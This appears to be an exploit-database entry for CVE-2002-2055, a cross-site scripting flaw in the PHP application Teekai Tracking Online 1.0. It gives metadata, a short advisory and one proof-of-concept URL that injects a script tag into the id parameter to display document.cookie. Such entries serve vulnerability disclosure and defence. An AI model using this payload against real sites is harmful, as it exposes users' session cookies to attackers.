Teekai Tracking Online 1.0 - Cross-Site Scripting

Author: frog
type: webapps
platform: php
port: 
date_added: 2002-06-03 
date_updated: 2012-09-24 
verified: 1 
codes: CVE-2002-2055;OSVDB-4163 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/4924/info

Teekai's Tracking Online does not adequately filter HTML tags from certain URL parameters, making it prone to cross-site scripting attacks. Attackers may exploit this by creating a malicious link to a vulnerable webpage.

http://target/page.php?action=view&id=1<script>alert(document.cookie)</script >